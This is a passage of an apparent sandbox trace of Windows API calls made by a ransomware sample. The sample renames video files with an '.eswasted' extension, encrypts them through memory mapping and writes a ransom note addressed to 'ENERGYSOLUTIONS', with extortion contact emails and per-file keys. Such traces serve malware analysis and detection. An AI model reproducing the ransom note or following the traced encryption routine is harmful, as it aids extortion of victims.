dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0082.120] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.122] SetEndOfFile (hFile=0x100) returned 1 [0082.122] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.122] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.122] lstrcpyW (in: lpString1=0x4ef4be, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.122] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SvYjXIGI6H VJRLLpY.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\svyjxigi6h vjrllpy.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SvYjXIGI6H VJRLLpY.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\svyjxigi6h vjrllpy.flv.eswasted")) returned 1 [0082.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SvYjXIGI6H VJRLLpY.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\svyjxigi6h vjrllpy.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0082.123] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0082.123] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x104c6 [0082.123] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x104c6) returned 0xb10000 [0082.123] CloseHandle (hObject=0xfc) returned 1 [0082.132] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0082.132] CloseHandle (hObject=0xf8) returned 1 [0082.132] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef6d0 [0082.132] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0082.133] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef718 | out: pbBuffer=0x4ef718) returned 1 [0082.133] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.133] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0082.134] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0082.134] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.142] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4eaa28 [0082.142] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6d0 | out: hHeap=0x4a0000) returned 1 [0082.142] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.142] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]vQU0VyZ5OQ2CQJXBgL18LTytqcRBlno6QwlAXgePOzxt0O2kLaQuSKlYpJ0qFF8p\r\n2LZaHteR/KTvQt6pMt2VDDKY4p6NOPsMWPxFiQlnY5B4dxRVA/Ou1+Ab4mYL6mXI\r\n3StgcbOawHbZh+wZrzcZpxg/xYDTutfMV6CUyz9LY8uOJAJqYhwKpac0FgFlGQXE\r\nAKLd+40yZmyyc1t7eqiVGF274EUVg6sd4CTbx4NkL7CcnR+8rR+xKUEpMkh8oeef\r\n5pAE1GizGocOEn8fv9Vi36waOkX1hyUeGWXhDaTepCa4Q2fE32C2Kv/XFJIvp8EP\r\nMTkgkuQUXHhNO/YrF+Jm+oWLnZvZuXIGrDzhnbwBeJiEvR5uZ5xorfHACG21s6MN\r\nFDz06L5FlOI1+MkCTww7Dbno9j1grazvV4/ekJbLE7YtnYcc0ZLb5nk0QLfqp+B9\r\nJNJGezMrbW7XXwkwftrUSuDEKXQ6CUfM1TEuaQyyMiwiCkJVD46pQoQEtydjLIXD\r\nJhlV55x6OnDyri2WCT/22ks6wjP17zq/Yf4GQPmh4776QckyojTQdvMVhKu5gLzP\r\nCR85aiJNdR0GfdxxceSQZzNnTu7tQLMEWlrMnkZVHcZfgQxKCCb4z3zxFnXB/OeF\r\nj6jkFrugfaWE9onKJ2kgThnZ6NroO20nCTFyEGz3U2z=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.142] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eaa28 | out: hHeap=0x4a0000) returned 1 [0082.142] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0082.143] SetEndOfFile (hFile=0x100) returned 1 [0082.145] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.145] CloseHandle (hObject=0x100) returned 1 [0082.146] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0082.146] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f2f50 | out: hHeap=0x4a0000) returned 1 [0082.147] _aulldvrm () returned 0x0 [0082.147] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0082.147] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0082.147] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.147] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YTAij7NctSQE3.flv") returned 58 [0082.147] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27e) returned 0x4ef440 [0082.147] lstrcpyW (in: lpString1=0x4ef4b4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.147] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.148] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0082.148] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.148] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YTAij7NctSQE3.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ytaij7nctsqe3.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0082.149] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.150] SetEndOfFile (hFile=0x100) returned 1 [0082.150] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.150] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.150] lstrcpyW (in: lpString1=0x4ef4b4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.150] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YTAij7NctSQE3.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ytaij7nctsqe3.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YTAij7NctSQE3.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ytaij7nctsqe3.flv.eswasted")) returned 1 [0082.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YTAij7NctSQE3.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ytaij7nctsqe3.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0082.151] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0082.151] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x9953 [0082.151] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9953) returned 0x2d0000 [0082.151] CloseHandle (hObject=0xf8) returned 1 [0082.154] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.154] CloseHandle (hObject=0xfc) returned 1 [0082.154] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef6c8 [0082.154] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0082.155] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef710 | out: pbBuffer=0x4ef710) returned 1 [0082.155] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.155] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0082.156] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0082.156] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.197] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4e9fd8 [0082.197] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6c8 | out: hHeap=0x4a0000) returned 1 [0082.197] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea3e8 [0082.197] _snwprintf (in: _Dest=0x4ea3e8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]m0Zz5PqwOg7D35WKZoYvFX+lrchRzO5WNwj5bFUL1LWyIW8cdCCVHW7bXKu2s5dQ\r\n+4EF+nfzoqKZhu5LjNH3Ywhbdi4hVNP06JdHq+u/TxwwPGyjeqR2YpuvG2uA33aH\r\nrEnfOCT29nkjMO/te0CK20+5mf4ZYvOTaSfY9lwR7qpAq09ru5nF/cokJk59xCsz\r\nDLiE4Y8zWpnHq7NDMcO3l6ppwXVvM7bYkQSfLzei25I/wJRUU7z8Ny8lfTKd2OS8\r\nlhzPjF7zJ98+rNJdeLKj6aB370ok6jO7S0t89Uel3Kh13wWD18MpohFzbDHYJ5NP\r\nSahYo71GbvJMv9aUj+w6VZ+y2HAgwhKlmqXhEXq+OwpzBCf3XV+3wC7eWDUiG0Cd\r\ng0Kk6bV6vPGt1nNrcYFBR2bdB14q/pXdYHwtvzBb/FHpyxpoagNK9fB6zsLMe/fY\r\n+RHqTqLIQKg9aZcP4SYEZcUdCQHTMUe1kVpHbCFDwq5NteKHzdt9hnw+eRcZKtmt\r\nFBpPpV5gnDbShjaV6bE2qx+8UKtAG+jSvwVEnZWOysFPKWSwr8tlw9B2L6msirF/\r\nU6XbQyPzo6159349uqRL+ThEKLlQ5pnnv1JqgB6C0ECsb2EbonRGVEhw/uR9CYpD\r\nfC44Jd3I7qNTJ1zuFPFNKSSdtb00Lz7Dp8ZYCdUkfXg=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.197] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.197] WriteFile (in: hFile=0x100, lpBuffer=0x4ea3e8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4ea3e8*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0082.198] SetEndOfFile (hFile=0x100) returned 1 [0082.200] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea3e8 | out: hHeap=0x4a0000) returned 1 [0082.200] CloseHandle (hObject=0x100) returned 1 [0082.202] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0082.202] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f4838 | out: hHeap=0x4a0000) returned 1 [0082.202] _aulldvrm () returned 0x0 [0082.202] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0082.203] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0082.203] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.203] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\4nWpxZmSP1.swf") returned 75 [0082.203] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a0) returned 0x4cb238 [0082.203] lstrcpyW (in: lpString1=0x4cb2ce, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.204] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.204] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0082.204] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0082.205] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\4nWpxZmSP1.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\4nwpxzmsp1.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0082.206] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.207] SetEndOfFile (hFile=0x100) returned 1 [0082.207] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.207] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.207] lstrcpyW (in: lpString1=0x4cb2ce, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\4nWpxZmSP1.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\4nwpxzmsp1.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\4nWpxZmSP1.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\4nwpxzmsp1.swf.eswasted")) returned 1 [0082.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\4nWpxZmSP1.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\4nwpxzmsp1.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0082.209] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0082.209] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x11fa8 [0082.209] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11fa8) returned 0xb10000 [0082.209] CloseHandle (hObject=0xf8) returned 1 [0082.214] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0082.214] CloseHandle (hObject=0xfc) returned 1 [0082.214] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ddfd8 [0082.214] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0082.215] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de020 | out: pbBuffer=0x4de020) returned 1 [0082.215] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.215] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0082.216] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0082.216] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.224] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ef440 [0082.224] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.224] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.224] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]QFxRSZmhawwKnDlJTqrvIaOq8sr8JfH2xFInEn97CqxmqR7sVGQvsDCDB1yw5dT4\r\n6+qk5Y4GJbWTOt0yV+qLlPjCKmsZS/4xYYTP6m57doK+OF10wFGIgmK1FnGBJYwT\r\nLWDR+/O5uzsBQjhdJw7FER55bZ2yAk2BefkbsGhcxteDsLAd6H7KdPQD1T5YV2Q2\r\nPdgm5mVL50Cg77JhhuB48VdKoXzs+kllJUd+ZrC1u/OXETXQ04+6aGz/aiaiFnur\r\n2GHcpOAe2pYmd5qdBzOnPOK/uUPGwR8tlmqmSqpwCnm2yDRpM13b7R/9usIuefZF\r\ncm6ARUAFx7BlHMIaoMM7vwLvKhGIweub4CyBhRDOtTzpZPYMqOoz5HCkJ9LOblBQ\r\n9ldSOA5jiNC+jys+fFOB7pJVZaWbeqDX5lSi1gW9t6zBnQz2Eitj0u5iRPTBfwam\r\nCrUgVlH3HJizYPZ30aa+FHkHTbP67p8uWr6WqnysxJvM63PhPulBE1Gev9BotvOG\r\ncV+dWdv+uA6eXP677glYc0GQq+VCCrtL7VucXjquZOyNVwyZsBzXO+Bv8UV1YQ1X\r\n1/qdXO8c5A5ZXKr4qLqF2LbTQv7tCBu/ObmfWJHEABJpXgMqXNIJYRu4tPnw+vp0\r\nuLkON8q9laIYxLIcgjrRmkbd5dVUWZRcCg4APjwiuCI=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.224] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0082.224] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0082.225] SetEndOfFile (hFile=0x100) returned 1 [0082.227] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.227] CloseHandle (hObject=0x100) returned 1 [0082.228] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cb238 | out: hHeap=0x4a0000) returned 1 [0082.229] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4efc20 | out: hHeap=0x4a0000) returned 1 [0082.229] _aulldvrm () returned 0x0 [0082.229] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0082.229] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0082.229] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.230] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\9xIZEDVYZFRgx7.mp4") returned 79 [0082.230] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a8) returned 0x4de5f0 [0082.230] lstrcpyW (in: lpString1=0x4de68e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.230] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.230] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0082.230] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0082.230] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\9xIZEDVYZFRgx7.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\9xizedvyzfrgx7.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0082.231] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.232] SetEndOfFile (hFile=0x100) returned 1 [0082.232] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.232] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.232] lstrcpyW (in: lpString1=0x4de68e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.232] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\9xIZEDVYZFRgx7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\9xizedvyzfrgx7.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\9xIZEDVYZFRgx7.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\9xizedvyzfrgx7.mp4.eswasted")) returned 